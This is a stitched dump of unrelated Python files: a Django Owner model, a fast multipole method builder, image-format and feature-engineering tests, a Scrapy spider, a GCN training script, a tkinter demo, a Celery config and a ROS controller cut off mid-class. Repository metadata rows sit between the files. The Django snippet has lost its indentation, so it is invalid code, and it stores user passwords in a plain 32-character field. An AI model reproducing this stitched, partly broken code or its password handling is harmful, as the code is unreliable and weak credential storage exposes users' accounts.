class Owner(models.Model):
Owner_id = models.AutoField
Owner_firstname = models.CharField(max_length=60)
Owner_lastname = models.CharField(max_length=60)
Owner_address = models.CharField(max_length=600)
Owner_email = models.CharField(max_length=100)
Owner_password = models.CharField(max_length=32)
Owner_dob = models.DateField()
Owner_mobileno = models.CharField(max_length=10)
Owner_gender = models.CharField(max_length=15)
Owner_license = models.ImageField(upload_to='img/Owner_License/')
Owner_agency = models.CharField(max_length=100)
Owner_city = models.CharField(max_length=30)
Owner_state = models.CharField(max_length=30)
Owner_country = models.CharField(max_length=30)
Owner_pincode = models.IntegerField()
isOwner = models.BooleanField(default=True)
def __str__(self):
return self.Owner_email + ": " + str(self.Owner_license)
| 42.217391
| 70
| 0.748713
| 914
| 0.941298
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.051493
|
425c5f6cf6cd74314b97f4bcb6721e3f260e8ac7
| 6,548
|
py
|
Python
|
tectosaur/fmm/builder.py
|
jlmaurer/tectosaur
|
7cc5606d814f061395b19754e7a4b6c5e4c236e5
|
[
"MIT"
] | 17
|
2017-06-29T16:48:56.000Z
|
2021-10-03T18:31:41.000Z
|
tectosaur/fmm/builder.py
|
jlmaurer/tectosaur
|
7cc5606d814f061395b19754e7a4b6c5e4c236e5
|
[
"MIT"
] | 4
|
2018-05-29T08:21:13.000Z
|
2021-04-01T01:28:50.000Z
|
tectosaur/fmm/builder.py
|
jlmaurer/tectosaur
|
7cc5606d814f061395b19754e7a4b6c5e4c236e5
|
[
"MIT"
] | 8
|
2019-06-10T22:19:40.000Z
|
2022-01-12T20:55:37.000Z
|
import numpy as np
import tectosaur.util.gpu as gpu
from tectosaur.fmm.c2e import build_c2e
import logging
logger = logging.getLogger(__name__)
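# Note (added): in make_tree below, 'm' is assumed to be a (points, triangle-indices)
# mesh pair; each tree cell bounds whole triangles via centroid and enclosing radius.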
def make_tree(m, cfg, max_pts_per_cell):
tri_pts = m[0][m[1]]
centers = np.mean(tri_pts, axis = 1)
pt_dist = tri_pts - centers[:,np.newaxis,:]
Rs = np.max(np.linalg.norm(pt_dist, axis = 2), axis = 1)
tree = cfg.traversal_module.Tree.build(centers, Rs, max_pts_per_cell)
return tree
class FMM:
def __init__(self, obs_tree, obs_m, src_tree, src_m, cfg):
self.cfg = cfg
self.obs_tree = obs_tree
self.obs_m = obs_m
self.src_tree = src_tree
self.src_m = src_m
self.gpu_data = dict()
self.setup_interactions()
self.collect_gpu_ops()
self.setup_output_sizes()
self.params_to_gpu()
self.tree_to_gpu(obs_m, src_m)
self.interactions_to_gpu()
self.d2e_u2e_ops_to_gpu()
def setup_interactions(self):
self.interactions = self.cfg.traversal_module.fmmmm_interactions(
self.obs_tree, self.src_tree, self.cfg.inner_r, self.cfg.outer_r,
self.cfg.order, self.cfg.treecode
)
def collect_gpu_ops(self):
self.gpu_ops = dict()
for a in ['s', 'p']:
for b in ['s', 'p']:
name = a + '2' + b
self.gpu_ops[name] = getattr(self.cfg.gpu_module, name + '_' + self.cfg.K.name)
self.gpu_ops['c2e1'] = self.cfg.gpu_module.c2e_kernel1
self.gpu_ops['c2e2'] = self.cfg.gpu_module.c2e_kernel2
def setup_output_sizes(self):
self.n_surf_tris = self.cfg.surf[1].shape[0]
self.n_surf_dofs = self.n_surf_tris * 9
self.n_multipoles = self.n_surf_dofs * self.src_tree.n_nodes
self.n_locals = self.n_surf_dofs * self.obs_tree.n_nodes
self.n_input = self.src_m[1].shape[0] * 9
self.n_output = self.obs_m[1].shape[0] * 9
def float_gpu(self, arr):
return gpu.to_gpu(arr, self.cfg.float_type)
def int_gpu(self, arr):
return gpu.to_gpu(arr, np.int32)
def params_to_gpu(self):
self.gpu_data['params'] = self.float_gpu(self.cfg.params)
def tree_to_gpu(self, obs_m, src_m):
gd = self.gpu_data
gd['obs_pts'] = self.float_gpu(obs_m[0])
gd['obs_tris'] = self.int_gpu(obs_m[1][self.obs_tree.orig_idxs])
gd['src_pts'] = self.float_gpu(src_m[0])
gd['src_tris'] = self.int_gpu(src_m[1][self.src_tree.orig_idxs])
obs_tree_nodes = self.obs_tree.nodes
src_tree_nodes = self.src_tree.nodes
for name, tree in [('src', self.src_tree), ('obs', self.obs_tree)]:
gd[name + '_n_C'] = self.float_gpu(tree.node_centers)
gd[name + '_n_R'] = self.float_gpu(tree.node_Rs)
for name, tree in [('src', src_tree_nodes), ('obs', obs_tree_nodes)]:
gd[name + '_n_start'] = self.int_gpu(np.array([n.start for n in tree]))
gd[name + '_n_end'] = self.int_gpu(np.array([n.end for n in tree]))
def interactions_to_gpu(self):
op_names = ['p2p', 'p2m', 'p2l', 'm2p', 'm2m', 'm2l', 'l2p', 'l2l']
for name in op_names:
op = getattr(self.interactions, name)
if type(op) is list:
for i, op_level in enumerate(op):
self.op_to_gpu(name + str(i), op_level)
else:
self.op_to_gpu(name, op)
def op_to_gpu(self, name, op):
for data_name in ['obs_n_idxs', 'obs_src_starts', 'src_n_idxs']:
self.gpu_data[name + '_' + data_name] = self.int_gpu(
np.array(getattr(op, data_name), copy = False)
)
def d2e_u2e_ops_to_gpu(self):
gd = self.gpu_data
gd['u2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.u2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.m2m))
]
gd['d2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.d2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.l2l))
]
u2e_UT, u2e_E, u2e_V = build_c2e(
self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg
)
gd['u2e_V'] = self.float_gpu(u2e_V)
gd['u2e_E'] = self.float_gpu(u2e_E)
gd['u2e_UT'] = self.float_gpu(u2e_UT)
d2e_UT, d2e_E, d2e_V = build_c2e(
self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg
)
gd['d2e_V'] = self.float_gpu(d2e_V)
gd['d2e_E'] = self.float_gpu(d2e_E)
gd['d2e_UT'] = self.float_gpu(d2e_UT)
def to_tree(self, input_orig):
orig_idxs = np.array(self.src_tree.orig_idxs)
input_orig = input_orig.reshape((-1,9))
return input_orig[orig_idxs,:].flatten()
def to_orig(self, output_tree):
orig_idxs = np.array(self.obs_tree.orig_idxs)
output_tree = output_tree.reshape((-1, 9))
output_orig = np.empty_like(output_tree)
output_orig[orig_idxs,:] = output_tree
return output_orig.flatten()
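# Note (added): report_interactions below compares the FMM interaction count against
# the dense O(n_obs_tris * n_src_tris) direct count; a small compression factor means savings.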
def report_interactions(fmm_obj):
dim = fmm_obj.obs_m[1].shape[1]
order = fmm_obj.cfg.surf[1].shape[0]
def count_interactions(op_name, op):
obs_surf = False if op_name[2] == 'p' else True
src_surf = False if op_name[0] == 'p' else True
return fmm_obj.cfg.traversal_module.count_interactions(
op, fmm_obj.obs_tree, fmm_obj.src_tree,
obs_surf, src_surf, order
)
n_obs_tris = fmm_obj.obs_m[1].shape[0]
n_src_tris = fmm_obj.src_m[1].shape[0]
level_ops = ['m2m', 'l2l']
ops = ['p2m', 'p2l', 'm2l', 'p2p', 'm2p', 'l2p']
interactions = dict()
for op_name in ops:
op = getattr(fmm_obj.interactions, op_name)
interactions[op_name] = count_interactions(op_name, op)
for op_name in level_ops:
ops = getattr(fmm_obj.interactions, op_name)
for op in ops:
if op_name not in interactions:
interactions[op_name] = 0
interactions[op_name] += count_interactions(op_name, op)
direct_i = n_obs_tris * n_src_tris
fmm_i = sum([v for k,v in interactions.items()])
logger.info('compression factor: ' + str(fmm_i / direct_i))
logger.info('# obs tris: ' + str(n_obs_tris))
logger.info('# src tris: ' + str(n_src_tris))
logger.info('total tree interactions: %e' % fmm_i)
for k, v in interactions.items():
logger.info('total %s interactions: %e' % (k, v))
| 36.786517
| 95
| 0.609652
| 4,655
| 0.710904
| 0
| 0
| 0
| 0
| 0
| 0
| 437
| 0.066738
|
425d43c4429c4fecedfff11a5de11c9d121390a6
| 2,553
|
py
|
Python
|
fabio/test/codecs/test_mpaimage.py
|
picca/fabio
|
bc3aae330bef6e1c983007562157edfe6d7daf91
|
[
"Apache-2.0"
] | null | null | null |
fabio/test/codecs/test_mpaimage.py
|
picca/fabio
|
bc3aae330bef6e1c983007562157edfe6d7daf91
|
[
"Apache-2.0"
] | 2
|
2019-04-24T13:43:41.000Z
|
2019-06-13T08:54:02.000Z
|
fabio/test/codecs/test_mpaimage.py
|
boesecke/fabio
|
11350e445a6def4d02c6860aea3ae7f36652af6a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Fable Input Output
# https://github.com/silx-kit/fabio
#
# Copyright (C) European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: Jérôme Kieffer (Jerome.Kieffer@ESRF.eu)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Multiwire Unit tests"""
from __future__ import print_function, with_statement, division, absolute_import
import unittest
import logging
logger = logging.getLogger(__name__)
import fabio
from ..utilstest import UtilsTest
class TestMpa(unittest.TestCase):
"""
    Test class for multiwire (mpa) images
"""
TESTIMAGES = [
# filename dim1 dim2 min max mean stddev
("mpa_test.mpa", 1024, 1024, 0, 1295, 0.8590, 18.9393),
]
def test_read(self):
"""
Test the reading of multiwire images
"""
for imageData in self.TESTIMAGES:
name, dim1, dim2, mini, maxi, mean, stddev = imageData
shape = dim2, dim1
logger.debug("Processing: %s" % name)
path = UtilsTest.getimage(name + ".bz2")[:-4]
obj = fabio.mpaimage.MpaImage()
obj.read(path)
self.assertAlmostEqual(mini, obj.getmin(), 2, "getmin [%s,%s]" % (mini, obj.getmin()))
self.assertAlmostEqual(maxi, obj.getmax(), 2, "getmax [%s,%s]" % (maxi, obj.getmax()))
self.assertAlmostEqual(mean, obj.getmean(), 2, "getmean [%s,%s]" % (mean, obj.getmean()))
self.assertAlmostEqual(stddev, obj.getstddev(), 2, "getstddev [%s,%s]" % (stddev, obj.getstddev()))
self.assertEqual(shape, obj.shape)
def suite():
loadTests = unittest.defaultTestLoader.loadTestsFromTestCase
testsuite = unittest.TestSuite()
testsuite.addTest(loadTests(TestMpa))
return testsuite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
| 34.04
| 111
| 0.653741
| 1,105
| 0.432485
| 0
| 0
| 0
| 0
| 0
| 0
| 1,220
| 0.477495
|
425dd97c671323bb5d6b53095ab3886bfc7da465
| 1,064
|
py
|
Python
|
currencySpider.py
|
cloud322/helloScrap
|
6313c5b99bce04c6a78a5dfb2ec910c73a33add3
|
[
"Apache-2.0"
] | null | null | null |
currencySpider.py
|
cloud322/helloScrap
|
6313c5b99bce04c6a78a5dfb2ec910c73a33add3
|
[
"Apache-2.0"
] | null | null | null |
currencySpider.py
|
cloud322/helloScrap
|
6313c5b99bce04c6a78a5dfb2ec910c73a33add3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import scrapy
import codecs
import sys
# On Linux, writing utf-8 content to a file requires setting the system default
# encoding to utf-8 (Python 2 only; Python 3 strings are already unicode)
try:
    reload(sys)
    sys.setdefaultencoding('utf8')
except NameError:
    pass  # Python 3 has no reload builtin and needs no setdefaultencoding
# In Scrapy, the spider is the core component responsible for crawling/scraping;
# this class defines the crawling/scraping procedure
class CurrSpider(scrapy.Spider):
name = 'currSpider'
start_urls = ['http://finance.naver.com/marketindex/?tabSel=exchange#tab_section']
def parse(self, response):
ranks = response.css('span.blind::text').extract()
titles = response.css('span.value::text').extract()
with codecs.open('curr.csv','w','utf-8') as f:
            # open the output file in write mode to save the processing results
# for i in range(0,4):
# rank = ranks[i].replace('\r\n', ' ')
# rank = ''.join(rank.split())
print(ranks)
# title = titles[i].replace('\r\n', ' ')
# title = title.strip().encode('utf-8')
print(titles)
            f.write('%s,%s\n' % (ranks, titles))
            # no explicit close needed: the with-block closes the file on exit
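# Hedged usage note (added): a self-contained spider like this is typically run with
# "scrapy runspider currencySpider.py" (assumes Scrapy is installed).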
| 28
| 86
| 0.56015
| 853
| 0.698036
| 0
| 0
| 0
| 0
| 0
| 0
| 698
| 0.571195
|
425f6d304bf8b5a8fd1c2a47d2f7c554468160b1
| 1,812
|
py
|
Python
|
tests/test_sanity_check/test_similar_columns.py
|
thibaultbl/feature_engine
|
08374227e7a88b67ee64b64f22e4f30390df9253
|
[
"BSD-3-Clause"
] | 1
|
2021-09-08T08:54:56.000Z
|
2021-09-08T08:54:56.000Z
|
tests/test_sanity_check/test_similar_columns.py
|
thibaultbl/feature_engine
|
08374227e7a88b67ee64b64f22e4f30390df9253
|
[
"BSD-3-Clause"
] | 1
|
2021-09-10T08:54:51.000Z
|
2021-09-10T08:54:51.000Z
|
tests/test_sanity_check/test_similar_columns.py
|
thibaultbl/feature_engine
|
08374227e7a88b67ee64b64f22e4f30390df9253
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import pandas as pd
from feature_engine.sanity_check import SimilarColumns
def test_similar_columns_when_more_columns_in_train_than_test(
df_vartypes, df_na
):
    # When train has more columns than test
train = df_na.copy()
test = df_vartypes.copy()
similar_columns = SimilarColumns()
similar_columns.fit(train)
transformed_df = similar_columns.transform(test)
expected_result = pd.DataFrame(
{
"Name": ["tom", "nick", "krish", "jack"],
"City": ["London", "Manchester", "Liverpool", "Bristol"],
"Studies": [np.nan, np.nan, np.nan, np.nan],
"Age": [20, 21, 19, 18],
"Marks": [0.9, 0.8, 0.7, 0.6],
"dob": pd.date_range("2020-02-24", periods=4, freq="T"),
}
)
pd.testing.assert_frame_equal(expected_result, transformed_df)
def test_similar_columns_when_more_columns_in_test_than_train(
df_vartypes, df_na
):
    # When test has more columns than train
train = df_vartypes
test = df_na
similar_columns = SimilarColumns()
similar_columns.fit(train)
transformed_df = similar_columns.transform(test)
expected_result = pd.DataFrame(
{
"Name": ["tom", "nick", "krish", np.nan, "peter", np.nan, "fred", "sam"],
"City": [
"London",
"Manchester",
np.nan,
np.nan,
"London",
"London",
"Bristol",
"Manchester",
],
"Age": [20, 21, 19, np.nan, 23, 40, 41, 37],
"Marks": [0.9, 0.8, 0.7, np.nan, 0.3, np.nan, 0.8, 0.6],
"dob": pd.date_range("2020-02-24", periods=8, freq="T"),
}
)
pd.testing.assert_frame_equal(expected_result, transformed_df)
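# Note (added): together the two tests suggest SimilarColumns aligns transform() output
# to the columns seen during fit(): missing columns are filled with NaN and extra
# columns are dropped.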
| 27.044776
| 85
| 0.557395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 308
| 0.169978
|
425fb9945bfce39ef08339e9cffda8aa831a4e3d
| 6,780
|
py
|
Python
|
examples/sem_seg_dense/train.py
|
megaelius/deep_gcns_torch
|
5d565a02020ff9faff3a34d55f278e7328c73ec2
|
[
"MIT"
] | null | null | null |
examples/sem_seg_dense/train.py
|
megaelius/deep_gcns_torch
|
5d565a02020ff9faff3a34d55f278e7328c73ec2
|
[
"MIT"
] | null | null | null |
examples/sem_seg_dense/train.py
|
megaelius/deep_gcns_torch
|
5d565a02020ff9faff3a34d55f278e7328c73ec2
|
[
"MIT"
] | null | null | null |
import __init__
import os
#os.environ['LD_LIBRARY_PATH'] += ':/usr/local/cuda-11.1/bin64:/usr/local/cuda-11.2/bin64'
import numpy as np
import torch
import torch.multiprocessing as mp
import torch_geometric.datasets as GeoData
from torch_geometric.loader import DenseDataLoader
import torch_geometric.transforms as T
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data.distributed import DistributedSampler
from config import OptInit
from architecture import DenseDeepGCN, CustomDenseDeepGCN
from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint
from utils.metrics import AverageMeter
import logging
from tqdm import tqdm
from parallel_wrapper import launch
import comm
from torch.utils.tensorboard import SummaryWriter
writer = SummaryWriter(log_dir='log/mlp4')
def train(model, train_loader, optimizer, criterion, opt, cur_rank):
opt.losses.reset()
model.train()
with tqdm(train_loader) as tqdm_loader:
for i, data in enumerate(tqdm_loader):
opt.iter += 1
desc = 'Epoch:{} Iter:{} [{}/{}] Loss:{Losses.avg: .4f}'\
.format(opt.epoch, opt.iter, i + 1, len(train_loader), Losses=opt.losses)
tqdm_loader.set_description(desc)
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y.to(opt.device)
# ------------------ zero, output, loss
optimizer.zero_grad()
out = model(inputs)
loss = criterion(out, gt)
# ------------------ optimization
loss.backward()
optimizer.step()
opt.losses.update(loss.item())
def test(model, loader, opt, cur_rank):
Is = np.empty((len(loader), opt.n_classes))
Us = np.empty((len(loader), opt.n_classes))
model.eval()
with torch.no_grad():
for i, data in enumerate(tqdm(loader)):
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y
out = model(inputs)
pred = out.max(dim=1)[1]
pred_np = pred.cpu().numpy()
target_np = gt.cpu().numpy()
for cl in range(opt.n_classes):
cur_gt_mask = (target_np == cl)
cur_pred_mask = (pred_np == cl)
I = np.sum(np.logical_and(cur_pred_mask, cur_gt_mask), dtype=np.float32)
U = np.sum(np.logical_or(cur_pred_mask, cur_gt_mask), dtype=np.float32)
Is[i, cl] = I
Us[i, cl] = U
ious = np.divide(np.sum(Is, 0), np.sum(Us, 0))
ious[np.isnan(ious)] = 1
iou = np.mean(ious)
if opt.phase == 'test':
for cl in range(opt.n_classes):
logging.info("===> mIOU for class {}: {}".format(cl, ious[cl]))
opt.test_value = iou
logging.info('TEST Epoch: [{}]\t mIoU: {:.4f}\t'.format(opt.epoch, opt.test_value))
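# Note (added): the IoU above is aggregated per class over all samples before dividing;
# e.g. intersections [3, 1] and unions [4, 2] give IoU = 4/6, not mean(3/4, 1/2).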
def epochs(opt):
logging.info('===> Creating dataloader ...')
train_dataset = GeoData.S3DIS(opt.data_dir, opt.area, True, pre_transform=T.NormalizeScale())
train_sampler = DistributedSampler(train_dataset, shuffle=True, seed=opt.seed)
train_loader = DenseDataLoader(train_dataset, batch_size=opt.batch_size, shuffle=False, sampler = train_sampler, num_workers=opt.n_gpus)
test_dataset = GeoData.S3DIS(opt.data_dir, opt.area, train=False, pre_transform=T.NormalizeScale())
test_sampler = DistributedSampler(test_dataset, shuffle=False, seed=opt.seed)
test_loader = DenseDataLoader(test_dataset, batch_size=opt.batch_size, shuffle=False, sampler = test_sampler, num_workers=opt.n_gpus)
opt.n_classes = train_loader.dataset.num_classes
cur_rank = comm.get_local_rank()
logging.info('===> Loading the network ...')
model = DistributedDataParallel(CustomDenseDeepGCN(opt).to(cur_rank),device_ids=[cur_rank], output_device=cur_rank,broadcast_buffers=False).to(cur_rank)
logging.info('===> loading pre-trained ...')
model, opt.best_value, opt.epoch = load_pretrained_models(model, opt.pretrained_model, opt.phase)
logging.info(model)
logging.info('===> Init the optimizer ...')
criterion = torch.nn.CrossEntropyLoss().to(cur_rank)
optimizer = torch.optim.Adam(model.parameters(), lr=opt.lr)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, opt.lr_adjust_freq, opt.lr_decay_rate)
optimizer, scheduler, opt.lr = load_pretrained_optimizer(opt.pretrained_model, optimizer, scheduler, opt.lr)
logging.info('===> Init Metric ...')
opt.losses = AverageMeter()
opt.test_value = 0.
logging.info('===> start training ...')
for _ in range(opt.epoch, opt.total_epochs):
opt.epoch += 1
train_sampler.set_epoch(opt.epoch)
test_sampler.set_epoch(opt.epoch)
logging.info('Epoch:{}'.format(opt.epoch))
train(model, train_loader, optimizer, criterion, opt, cur_rank)
if opt.epoch % opt.eval_freq == 0 and opt.eval_freq != -1:
test(model, test_loader, opt, cur_rank)
scheduler.step()
if comm.is_main_process():
# ------------------ save checkpoints
            # higher IoU is better: mark as best when the new value beats the stored max
            is_best = (opt.test_value > opt.best_value)
opt.best_value = max(opt.test_value, opt.best_value)
model_cpu = {k: v.cpu() for k, v in model.state_dict().items()}
save_checkpoint({
'epoch': opt.epoch,
'state_dict': model_cpu,
'optimizer_state_dict': optimizer.state_dict(),
'scheduler_state_dict': scheduler.state_dict(),
'best_value': opt.best_value,
}, is_best, opt.ckpt_dir, opt.exp_name)
# ------------------ tensorboard log
info = {
'loss': opt.losses.avg,
'test_value': opt.test_value,
'lr': scheduler.get_lr()[0]
}
writer.add_scalar('Train Loss', info['loss'], opt.epoch)
writer.add_scalar('Test IOU', info['test_value'], opt.epoch)
writer.add_scalar('lr', info['lr'], opt.epoch)
    logging.info('Saving the final model. Finished!')
def hola():
print('Hola')
def main():
opt = OptInit().get_args()
'''
This wrapper taken from detectron2 (https://github.com/facebookresearch/detectron2/blob/main/detectron2/engine/launch.py),
creates n_gpus processes and launches epochs function on each of them.
'''
launch(
epochs,
num_gpus_per_machine=opt.n_gpus,
num_machines=1,
machine_rank=0,
dist_url='auto',
args=(opt,)
)
#epochs(opt)
if __name__ == '__main__':
main()
| 39.649123
| 156
| 0.633333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,001
| 0.14764
|
426012a76defd0d35b2275dd689a17428018f29c
| 707
|
py
|
Python
|
sources/tkinter/prog03.py
|
kantel/pythoncuriosa
|
4dfb92b443cbe0acf8d8efa5c54efbf13e834620
|
[
"MIT"
] | null | null | null |
sources/tkinter/prog03.py
|
kantel/pythoncuriosa
|
4dfb92b443cbe0acf8d8efa5c54efbf13e834620
|
[
"MIT"
] | null | null | null |
sources/tkinter/prog03.py
|
kantel/pythoncuriosa
|
4dfb92b443cbe0acf8d8efa5c54efbf13e834620
|
[
"MIT"
] | null | null | null |
import tkinter as tk
from tkinter import ttk
win = tk.Tk()
win.title("Python GUI")
win.resizable(False, False)
win.configure(background = "grey94")
a_label = ttk.Label(win, text = "Gib Deinen Namen ein:")
a_label.grid(column = 0, row = 0)
a_label.grid_configure(padx = 8, pady = 8)
def clickMe():
action.configure(text = "Hallöchen " + name.get())
name = tk.StringVar()
name_entered = ttk.Entry(win, width = 12, textvariable = name)
name_entered.grid(column = 0, row = 1)
name_entered.grid_configure(padx = 8, pady = 8)
name_entered.focus()
action = ttk.Button(win, text = "Drück mich!", command = clickMe)
action.grid(column = 1, row = 1)
action.grid_configure(padx = 8, pady = 8)
win.mainloop()
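# Note (added): the Entry widget is bound to the StringVar 'name'; clickMe() reads it
# via name.get() when the button fires its command callback.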
| 26.185185
| 65
| 0.701556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.098731
|
4260837af4a64a8bea9204399d75709291c91101
| 528
|
py
|
Python
|
openarticlegauge/slavedriver.py
|
CottageLabs/OpenArticleGauge
|
58d29b4209a7b59041d61326ffe1cf03f98f3cff
|
[
"BSD-3-Clause"
] | 1
|
2016-04-07T18:29:27.000Z
|
2016-04-07T18:29:27.000Z
|
openarticlegauge/slavedriver.py
|
CottageLabs/OpenArticleGauge
|
58d29b4209a7b59041d61326ffe1cf03f98f3cff
|
[
"BSD-3-Clause"
] | 11
|
2015-01-06T15:53:09.000Z
|
2022-03-01T01:46:14.000Z
|
openarticlegauge/slavedriver.py
|
CottageLabs/OpenArticleGauge
|
58d29b4209a7b59041d61326ffe1cf03f98f3cff
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Initialise the Celery instance to be used by the application
This is largely just boilerplate, and we could probably come back to it and clean it
up a bit in the future.
"""
from __future__ import absolute_import
from celery import Celery
celery = Celery()
from openarticlegauge import celeryconfig
celery.config_from_object(celeryconfig)
# Optional configuration, see the application user guide.
celery.conf.update(
CELERY_TASK_RESULT_EXPIRES=3600,
)
if __name__ == '__main__':
celery.start()
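# Hedged usage note (added): the worker is normally started from the CLI, e.g.
# "celery -A openarticlegauge.slavedriver worker --loglevel=info" (module path assumed).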
| 21.12
| 98
| 0.780303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 260
| 0.492424
|
42629d99092a4d568c978d01f8d8dafafec338c9
| 28,061
|
py
|
Python
|
cbf_ros/scripts/cbf_controller_sy.py
|
k1majd/CBF_TB_RRT
|
2632357d42155de6dec5802c337a5abfdc824aac
|
[
"MIT"
] | 2
|
2021-10-07T17:06:57.000Z
|
2021-11-23T15:58:14.000Z
|
cbf_ros/scripts/cbf_controller_sy.py
|
k1majd/CBF_TB_RRT
|
2632357d42155de6dec5802c337a5abfdc824aac
|
[
"MIT"
] | 1
|
2021-10-13T17:18:32.000Z
|
2021-10-13T17:37:26.000Z
|
cbf_ros/scripts/cbf_controller_sy.py
|
k1majd/CBF_TB_RRT
|
2632357d42155de6dec5802c337a5abfdc824aac
|
[
"MIT"
] | 1
|
2021-11-30T11:09:43.000Z
|
2021-11-30T11:09:43.000Z
|
#! /usr/bin/env python
# call roscore
# $ roscore
#
# If start in manual
# $ rosrun cbf_ros cbf_controller.py
import rospy
import sys
import argparse
import re
import numpy as np
from scipy.integrate import odeint
from sympy import symbols, Matrix, sin, cos, lambdify, exp, sqrt, log
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import cvxopt as cvxopt
# ROS msg
from geometry_msgs.msg import Twist
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Vector3
from nav_msgs.msg import Odometry
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import GetWorldProperties, GetModelState, GetModelStateRequest
# ROS others
import tf
DEBUG = False
def orientation2angular(orientation):
quaternion = ( orientation.x,
orientation.y,
orientation.z,
orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
angular = Vector3(
euler[0],
euler[1],
euler[2]
)
return angular
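# Note (added): e.g. the identity quaternion (x, y, z, w) = (0, 0, 0, 1) maps to
# roll = pitch = yaw = 0.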
def cvxopt_solve_qp(P, q, G=None, h=None, A=None, b=None):
P = .5 * (P + P.T) # make sure P is symmetric
args = [cvxopt.matrix(P), cvxopt.matrix(q)]
if G is not None:
args.extend([cvxopt.matrix(G), cvxopt.matrix(h)])
if A is not None:
args.extend([cvxopt.matrix(A), cvxopt.matrix(b)])
cvxopt.solvers.options['show_progress'] = False
cvxopt.solvers.options['maxiters'] = 100
sol = cvxopt.solvers.qp(*args)
if 'optimal' not in sol['status']:
return None
return np.array(sol['x']).reshape((P.shape[1],))
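# Hedged usage sketch (added, values are illustrative): the helper above minimizes
# 0.5*x'Px + q'x subject to G x <= h, e.g.
#   P = np.eye(2); q = np.array([1.0, 0.0])
#   G = np.array([[-1.0, 0.0]]); h = np.array([0.0])   # enforce x0 >= 0
#   x = cvxopt_solve_qp(P, q, G, h)                    # -> approximately [0.0, 0.0]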
def plottrajs(trajs):
if plotanimation:
for j in range(len(trajs.hsr)):
plt.axis([-10,10,-10,10],color ="black")
plt.plot([-1.4,-1.4],[-7,7],color ="black")
plt.plot([1.3,1.3],[-7,-1.5],color ="black")
plt.plot([1.3,1.3],[1.4,7],color ="black")
plt.plot([1.3,7],[1.4,1.4],color ="black")
plt.plot([1.3,7],[-1.5,-1.5],color ="black")
plt.plot(trajs.hsr[j][1],-trajs.hsr[j][0],color ="green",marker = 'o')
plt.arrow(float(trajs.hsr[j][1]),float(-trajs.hsr[j][0]), float(2*trajs.commands[j][0]*sin(trajs.hsr[j][2])), float(-2*trajs.commands[j][0]*cos(trajs.hsr[j][2])), width = 0.05)
for k in range(len(trajs.actors[j])):
plt.plot(trajs.actors[j][k][1],-trajs.actors[j][k][0],color ="red",marker = 'o')
plt.draw()
plt.pause(np.finfo(float).eps)
plt.clf()
plt.ion()
plt.axis([-10,10,-10,10],color ="black")
plt.plot([-1.4,-1.4],[-7,7],color ="black")
plt.plot([1.3,1.3],[-7,-1.5],color ="black")
plt.plot([1.3,1.3],[1.4,7],color ="black")
plt.plot([1.3,7],[1.4,1.4],color ="black")
plt.plot([1.3,7],[-1.5,-1.5],color ="black")
for j in range(len(trajs.hsr)):
plt.axis([-10,10,-10,10])
plt.plot(trajs.hsr[j][1],-trajs.hsr[j][0],color ="green",marker = 'o',markersize=2)
for k in range(len(trajs.actors[j])):
plt.plot(trajs.actors[j][k][1],-trajs.actors[j][k][0],color ="red",marker = 'o',markersize=2)
plt.draw()
plt.pause(np.finfo(float).eps)
plt.ioff()
fig, axs = plt.subplots(4)
axs[0].set(ylabel = 'velocity input')
# axs[1].set_title('risk')
# axs[2].set_title('min Dist')
axs[1].set(ylabel = 'angular velocity input')
axs[2].set(ylabel = 'risk')
axs[3].set(xlabel = 'time', ylabel = 'min Dist')
for k in range(len(trajs.time)):
axs[0].plot(trajs.time[k], trajs.commands[k][0],color ="green",marker = 'o',markersize=2)
axs[1].plot(trajs.time[k], trajs.commands[k][1],color ="green",marker = 'o',markersize=2)
if trajs.risk[k]<risk:
axs[2].plot(trajs.time[k], trajs.risk[k],color ="green",marker = 'o',markersize=2)
else:
axs[2].plot(trajs.time[k], trajs.risk[k],color ="red",marker = 'o',markersize=2)
axs[3].plot(trajs.time[k], trajs.minDist[k],color ="green",marker = 'o',markersize=2)
plt.draw()
plt.pause(60)
    pass  # no-op placeholder
# plt.ioff()
# plt.figure(3)
# for k in range(len(trajs.time)):
# plt.plot(trajs.time[k], trajs.risk[k],color ="green",marker = 'o')
# plt.draw()
# 1
class robot(object):
def __init__(self,l):
#Symbolic Variables
# t = symbols('t')
# when robot is bicycle model [x,y,theta], obstacles are linear models [x,y]:
xr1,xr2,xr3,xo1,xo2 = symbols('xr1 xr2 xr3 xo1 xo2')
# v w inputs of robot:
u1,u2 = symbols('u1,u2')
